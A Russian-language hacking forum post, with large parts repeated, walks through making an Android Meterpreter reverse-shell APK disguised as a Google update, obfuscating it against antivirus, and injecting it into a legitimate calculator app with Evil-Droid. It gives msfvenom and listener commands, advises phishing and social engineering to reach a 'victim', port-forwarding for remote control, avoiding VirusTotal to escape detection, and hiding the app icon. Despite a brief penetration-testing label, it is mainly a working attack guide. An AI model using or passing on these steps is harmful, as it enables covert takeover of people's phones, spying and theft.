Вcтупление.
Все, кто знаком с Metasploit Project, скорее всего знакомы с MSFvenom (популярный генератор payload) и Meterpreter (расширяемая нагрузка для пост-эксплуатации). С помощью этих инструментов можно при определенных условиях получить НСД к Android-устройству (небольшой мануал для тех, кто не в теме https://codeby.net/forum/threads/sposob-dostavki-payload-na-smartfon-bazirovannyj-na-android.60929/).
Это выглядит примерно так:
Но не все так просто. Не зря выше я написал про "примерно" и "определенные условия". Я часто читаю комментарии под видео на YouTube от кретинов: "Автор мудак, ничего не объясняет, просто пишет команды в консоли". А вы думали вас еще бесплатно кто-то учить с 0 будет? Это вам не школа, сука. Нету никакой кнопки "ВЫСЛЕДИТЬ ПО IP И ВЗЛОМАТЬ"есть вычислить по IQ тупого школьника.
В нашем деле нету однозначно работающих решений, мир вокруг нас постоянно меняется, в том числе ИТ-сфера, старые методы взлома перестают работать, все время надо искать что-то новое.
Так вот, некоторых очень волнует вопрос: "А как закинуть наш google_update.apk на смартфон жертве, да еще чтобы AV не детектировал наш файл? Для этого нужнозакриптовать обфусцировать приложение, прогнать через Zipalign, подписать и а также применить СИ для доставки на целевое устройство. Дефолтный apk, который выплевывает MSFvenom ни на что не годен - скажите, кто будет устанавливать приложение с названием:"MainActivity", без иконки, с кучей требуемых разрешений? К тому же его скорее всего с радостью схрумкает AV жертвы.
Я потратил немного времени на поиск обфускаторов для apk:
Установка.
Использование.
Вопрос: "Как управлять устройством не из локальной сети, а из глобальной?
P.S. Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отлично гуглится. Кейсом занимаюсь лично сам, если есть вопросы пишите в личку/тему.
P.P.S. Обзор рассчитан на пользователей, только начинающих работать с MSF и прочими инструментами для тестирования на проникновение в качестве практического примера. Так что не надо срать по этому поводу в теме.
Все, кто знаком с Metasploit Project, скорее всего знакомы с MSFvenom (популярный генератор payload) и Meterpreter (расширяемая нагрузка для пост-эксплуатации). С помощью этих инструментов можно при определенных условиях получить НСД к Android-устройству (небольшой мануал для тех, кто не в теме https://codeby.net/forum/threads/sposob-dostavki-payload-na-smartfon-bazirovannyj-na-android.60929/).
Это выглядит примерно так:
# cd/sdcard
# msfvenom -p android/meterpreter/reverce_tcp lhost=192.168.1.45 lport=443 R > google_update.apk
# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set lhost 192.168.1.45
# set lport 443
# exploit
meterpreter >
# msfvenom -p android/meterpreter/reverce_tcp lhost=192.168.1.45 lport=443 R > google_update.apk
# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set lhost 192.168.1.45
# set lport 443
# exploit
meterpreter >
Мануал предназначен для продвинутых пользователей, интересующихся мобильным пентестом и установкой кастомных прошивок. Это означает, что некоторые очевидные моменты я буду опускать. Cайты на которых есть подробности - 4pda, xda-developers, kali.org.
Ссылки в рамках данного мануала не являются рекламой.
Но не все так просто. Не зря выше я написал про "примерно" и "определенные условия". Я часто читаю комментарии под видео на YouTube от кретинов: "Автор мудак, ничего не объясняет, просто пишет команды в консоли". А вы думали вас еще бесплатно кто-то учить с 0 будет? Это вам не школа, сука. Нету никакой кнопки "ВЫСЛЕДИТЬ ПО IP И ВЗЛОМАТЬ"
В нашем деле нету однозначно работающих решений, мир вокруг нас постоянно меняется, в том числе ИТ-сфера, старые методы взлома перестают работать, все время надо искать что-то новое.
Так вот, некоторых очень волнует вопрос: "А как закинуть наш google_update.apk на смартфон жертве, да еще чтобы AV не детектировал наш файл? Для этого нужно
Честно говоря есть еще один путь - собрать троян самостоятельно
https://codeby.net/forum/threads/sobiraem-skrytyj-trojan-na-android-persistence-chast-i.58392/ часть 1
https://codeby.net/forum/threads/sobiraem-skrytyj-trojan-na-andrroid-persistance-chast-ii.58467/ часть 2,
но мне не хотелось ебаться с Android SDK.
https://codeby.net/forum/threads/sobiraem-skrytyj-trojan-na-android-persistence-chast-i.58392/ часть 1
https://codeby.net/forum/threads/sobiraem-skrytyj-trojan-na-andrroid-persistance-chast-ii.58467/ часть 2,
но мне не хотелось ебаться с Android SDK.
Я потратил немного времени на поиск обфускаторов для apk:
1. AVPass - вроде бы годный, и главное свежий проект. Но, к сожалению, я пока с ним не разобрался. Он выдает битые приложения, Zipalign не помогает. Кто пробовал его в работе - просьба отписать в тему/личку
(https://github.com/sslab-gatech/avpass
https://codeby.net/forum/threads/avpass-instrument-dlja-obxoda-antivirusa-na-android.60131/).
2. ProGuard - утилита, которая удаляет из скомпилированного кода неиспользуемые фрагменты и изменяет имена переменных и методов для усложнения реверс-инжиниринга приложения. Я сам мало работал с Android SDK и этот вариант не рассматривал, тоже было бы неплохо увидеть мануал по работе с ним
(https://www.guardsquare.com/en/proguard
http://jollydroid.ru/notebook/2016-12-29-ProGuard-1).
3. Stringer Java Obfuscation. Им я не пользовался, он платный, так же подозреваю что его выходную работу палят многие AV
(https://jfxstore.com/stringer/
https://habrahabr.ru/post/144377/).
4. Apkwash. Аналогично номеру 1, не было времени произвести полноценное тестирование. Вылезают какие-то странные баги.
(https://github.com/jbreed/apkwash
https://pentestlab.blog/2017/03/13/injecting-metasploit-payloads-into-android-applications/).
5. Evil-Droid. Тоже свежий проект, как раз он мне и понравился. Он предоставляет возможность создать дефолтную/обфусцированную нагрузку для meterpreter, собственную подпись, проводить инжект в "чистые" apk, клонировать/делать фейковые страницы. Так же из скрипта можно запустить MSF
(https://github.com/M4sc3r4n0/Evil-Droid).
6. DexProtector. По нему информации почти нет.
(https://dexprotector.com/
https://jfxstore.com/stringer/ru/bl...chita-android-prilozheniy-na-grani-tehnologiy).
P.S. Если знаете еще способы - пишите в комментарии/личку
(https://github.com/sslab-gatech/avpass
https://codeby.net/forum/threads/avpass-instrument-dlja-obxoda-antivirusa-na-android.60131/).
2. ProGuard - утилита, которая удаляет из скомпилированного кода неиспользуемые фрагменты и изменяет имена переменных и методов для усложнения реверс-инжиниринга приложения. Я сам мало работал с Android SDK и этот вариант не рассматривал, тоже было бы неплохо увидеть мануал по работе с ним
(https://www.guardsquare.com/en/proguard
http://jollydroid.ru/notebook/2016-12-29-ProGuard-1).
3. Stringer Java Obfuscation. Им я не пользовался, он платный, так же подозреваю что его выходную работу палят многие AV
(https://jfxstore.com/stringer/
https://habrahabr.ru/post/144377/).
4. Apkwash. Аналогично номеру 1, не было времени произвести полноценное тестирование. Вылезают какие-то странные баги.
(https://github.com/jbreed/apkwash
https://pentestlab.blog/2017/03/13/injecting-metasploit-payloads-into-android-applications/).
5. Evil-Droid. Тоже свежий проект, как раз он мне и понравился. Он предоставляет возможность создать дефолтную/обфусцированную нагрузку для meterpreter, собственную подпись, проводить инжект в "чистые" apk, клонировать/делать фейковые страницы. Так же из скрипта можно запустить MSF
(https://github.com/M4sc3r4n0/Evil-Droid).
6. DexProtector. По нему информации почти нет.
(https://dexprotector.com/
https://jfxstore.com/stringer/ru/bl...chita-android-prilozheniy-na-grani-tehnologiy).
P.S. Если знаете еще способы - пишите в комментарии/личку
Установка.
Для начала ставим зависимости,
затем сам скрипт:
# git clone https://github.com/M4sc3r4n0/Evil-Droid.git
# cd Evil-Droid
# chmod +x evil-droid
metasploit-framework, xterm, Zenity, Aapt, Apktool, Zipalign, (если apt-get install не находит пакет, пишем название с маленькой буквы)
# git clone https://github.com/M4sc3r4n0/Evil-Droid.git
# cd Evil-Droid
# chmod +x evil-droid
https://github.com/CorpOfHack/Evil-Droid-RU/
Наши коллеги с другого форума решили форкнуть данный проект, пока доступна только русификация
Наши коллеги с другого форума решили форкнуть данный проект, пока доступна только русификация
ВНИМАНИЕ: ни в ком случае не заливайте результаты своей работы на VirusTotal, используйте что-нибудь другое, не сливающее статистику. Либо просто тестируйте на виртуальной машине/реальном устройстве.
Использование.
1. запускаем скрипт: # ./evil-droid
2. выбираем нужный нам пункт меню, тут самое интересное - можно выбрать 3 пункт, но тогда мы получим обычную MSF малварю, которая хоть и не будет съедена AV благодаря обработке скриптом, но имеет шансы засветиться, я предлагаю использовать более надежный метод - под номером 2 (инъекция в "чистое" приложение, я выбрал MyScript Calculator, Вы можете другое, однако имейте ввиду что некоторые, особенно mod варианты с 4pda не будут корректно обработаны)
3. дальше все просто, задаем параметры для полезной нагрузки, предлагаемые программой, для тех, кто хоть чуть-чуть знаком с MSF проблем не должно возникнуть
4. используем СИ, фишинг и иже с ними для доставки добра на целевое устройство
5. когда пользователь откроет у себя наше модифицированное приложение, мы получим meterpreter >
6. Profit!
3. дальше все просто, задаем параметры для полезной нагрузки, предлагаемые программой, для тех, кто хоть чуть-чуть знаком с MSF проблем не должно возникнуть
4. используем СИ, фишинг и иже с ними для доставки добра на целевое устройство
5. когда пользователь откроет у себя наше модифицированное приложение, мы получим meterpreter >
6. Profit!
Вопрос: "Как управлять устройством не из локальной сети, а из глобальной?
В качестве LHOST используйте свой публичный IP, payload необходимо выбрать reverse_https, LPORT=443, и пробросить порт на роутере 443 на локальный адрес Kali
Напомню, что разрешения, которые запрашивает приложение при установке, могут вызвать подозрения у пользователя. Так же советую подробно изучить Android-опции в meterpreter (например hide_app_icon, send_sms) и поработать со скриптом из под NetHunter. По результатам моих тестов на реальном устройстве DrWeb и Avast ничего не заметили(я про активную защиту, что будет при сканировании не смотрел).
P.S. Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отлично гуглится. Кейсом занимаюсь лично сам, если есть вопросы пишите в личку/тему.
P.P.S. Обзор рассчитан на пользователей, только начинающих работать с MSF и прочими инструментами для тестирования на проникновение в качестве практического примера. Так что не надо срать по этому поводу в теме.
Последнее редактирование:
